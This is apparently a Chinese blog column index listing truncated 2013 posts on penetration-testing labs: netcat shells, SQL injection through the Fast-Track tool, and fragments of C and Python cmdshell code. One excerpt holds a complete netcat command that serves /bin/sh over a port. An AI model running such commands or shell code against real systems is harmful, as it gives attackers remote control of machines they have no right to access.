Reverse Shell
关注
分享
扫一扫
feier7501
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
netcat获得反向shell
netcat下载地址:http://sourceforge.net/projects/netcat/?source=navbar在BT5上:root@bt:~# nc -l -p 8090 -e /bin/sh在XP上:E:\>nc 192.168.1.11 8090lsDesktopifconfigeth0 Link encap:Ethernet HWaddr原创 2013-07-06 17:20:40 · 4013 阅读 · 0 评论 -
Reverse Shell Cheat Sheet
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheetIf you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll转载 2013-07-06 17:22:25 · 898 阅读 · 0 评论 -
MSSQL2K - SQL Injector - Query String Parameter Attack获得反向cmdshell
上次没有成功获得cmdshell,因为fasttrack没有这方面的代码,这次编写了server.py。原来的博客链接:http://blog.youkuaiyun.com/feier7501/article/details/9220495import socketHOST = ''PORT = 4444s = socket.socket(socket.AF_INET, socket原创 2013-07-07 16:55:25 · 1639 阅读 · 0 评论 -
MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
fasttrack操作:root@bt:~# cd /pentest/exploits/fasttrack/root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i****************************************************** Performing dependency checks...原创 2013-07-08 20:23:10 · 1161 阅读 · 0 评论 -
SQL Injector - GET Manual Setup Binary Payload Attack
bt5上操作: ***************************************************************** ** ** ** Fast-Track - A new beginning...原创 2013-07-08 21:43:26 · 1058 阅读 · 0 评论 -
SQL Injector - POST Parameter Attack
login.jsp如下:<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>Register user username: password: bt5上操作如下:root@bt:/pentest/exploits/fasttrack原创 2013-07-08 21:32:47 · 1376 阅读 · 0 评论 -
fasttrack的SQLPwnage(失败)
这次也是失败的,操作如下:root@bt:/pentest/exploits/fasttrack# ./fast-track.py -iFast-Track Main Menu: 1. Fast-Track Updates 2. Autopwn Automation 3. Nmap Scripting Engine 4. Microsoft SQL原创 2013-07-11 21:08:24 · 1057 阅读 · 0 评论 -
端口重用打开cmdshell
要重用的端口是tomcat的默认http端口8080。源代码:#include #pragma comment(lib, "ws2_32.lib")#define LISTEN_PORT 8080int main() { WSADATA ws; SOCKET listenFD; WSAStartup(MAKEWORD(2, 2), &ws); listenFD = WSA原创 2013-07-22 23:15:43 · 854 阅读 · 0 评论 -
反向连接打开cmdshell
源代码:#include #include #pragma comment(lib,"Ws2_32") #define LISTEN_PORT 9090int main() { WSADATA ws; SOCKET listenFD; int ret; WSAStartup(MAKEWORD(2, 2), &ws); listenFD = WSASocket(AF_IN原创 2013-07-22 22:22:13 · 1115 阅读 · 0 评论